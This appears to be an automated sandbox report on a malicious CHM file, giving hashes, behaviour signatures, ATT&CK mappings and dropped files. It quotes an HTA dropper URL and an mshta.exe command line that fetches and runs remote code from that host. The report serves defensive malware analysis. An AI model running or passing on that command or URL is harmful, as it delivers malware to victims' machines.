b16ebaec337178a9f4c661d84a9998e453f4b693eab3e3fbc9bb6b957661f3c6

Analysis

max time kernel
147s
max time network
149s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
21-03-2023 23:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Message.chm
Size

23KB
MD5

a2a8094933150e18fb31f24b5e20643b
SHA1

e4a2958358b33ad814828efeaa6295eb46510599
SHA256

c529b6e0b012d8246f9f2720f72253d8d52a1a58f2ee3db32128b2a96c813b9a
SHA512

24b43e8452d0b0fc76cb60e6c99e2537c7038ab6808f48ce1578733f1b39e53cffd2a437338ecbcec43944b6331a08657918cb6cfdbaa89db6c2e85ebdf0a6c9
SSDEEP

384:2yOvnvzjch5duuyTvBLalWcOrFETyshkB+6tBUMk0zpU:2yOvnbwhv+v1rc4FE+shq+67ZpU

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://attiferstudio.com/install.bak/sony/7.html

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

mshta.exe

flow pid process

7 520 mshta.exe

flow	pid	process
7	520	mshta.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

hh.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main	hh.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

AUDIODG.EXEhh.exe

description	pid	process
Token: 33	1456	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1456	AUDIODG.EXE
Token: 33	1456	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1456	AUDIODG.EXE
Token: SeRestorePrivilege	1292	hh.exe
Token: SeRestorePrivilege	1292	hh.exe
Token: SeRestorePrivilege	1292	hh.exe
Token: SeRestorePrivilege	1292	hh.exe
Token: SeRestorePrivilege	1292	hh.exe
Token: SeRestorePrivilege	1292	hh.exe
Token: SeRestorePrivilege	1292	hh.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

hh.exe

pid process

1292 hh.exe
1292 hh.exe

pid	process
1292	hh.exe
1292	hh.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

hh.exe

description	pid	process	target process
PID 1292 wrote to memory of 520	1292	hh.exe	mshta.exe
PID 1292 wrote to memory of 520	1292	hh.exe	mshta.exe
PID 1292 wrote to memory of 520	1292	hh.exe	mshta.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\Message.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/7.html ,
2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:520

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x57c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1456

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
61KB

MD5
e71c8443ae0bc2e282c73faead0a6dd3

SHA1
0c110c1b01e68edfacaeae64781a37b1995fa94b

SHA256
95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

SHA512
b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S7FIT0B8\INISAFEMailv4[1].cab
Filesize
2.2MB

MD5
8abb4e13ee3f94df4b5e276ef6cb0144

SHA1
819db68fcd5a8673383c82898b729f16b77054d2

SHA256
c0eee87ea1144be28d12e5af7a3307c6a690029bef1e7b43ca08aa8fde0f2c61

SHA512
f9bbb330cf5615cefed666c84010b685feb4f8cc7e36c1044e57a22b2a5fc7bd4a922157bc9acdfe49629d7bff0eaec6cfd336a2732a25cb895c574a2c2ea930

Download Submit
C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\INISAFEMailv4.inf
Filesize
538B

MD5
10418288c546673054c4bd83220ffeef

SHA1
b179588f320e234899a101ecd651bd024569d8bc

SHA256
eff48ef0b99ff404fed484df294d18018c5be12fcc7d2d778c18fd0d01c07971

SHA512
a96a226821148090c1de744552a3d26c858070cb4ee60c508bf29ef9ff302a85bcfd23c7fbd10c8f9c5871e43f6ff1919e2a9e08c05e7c6127943b485ba6b160

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4E0A.tmp
Filesize
161KB

MD5
be2bec6e8c5653136d3e72fe53c98aa3

SHA1
a8182d6db17c14671c3d5766c72e58d87c0810de

SHA256
1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd

SHA512
0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff

Download Submit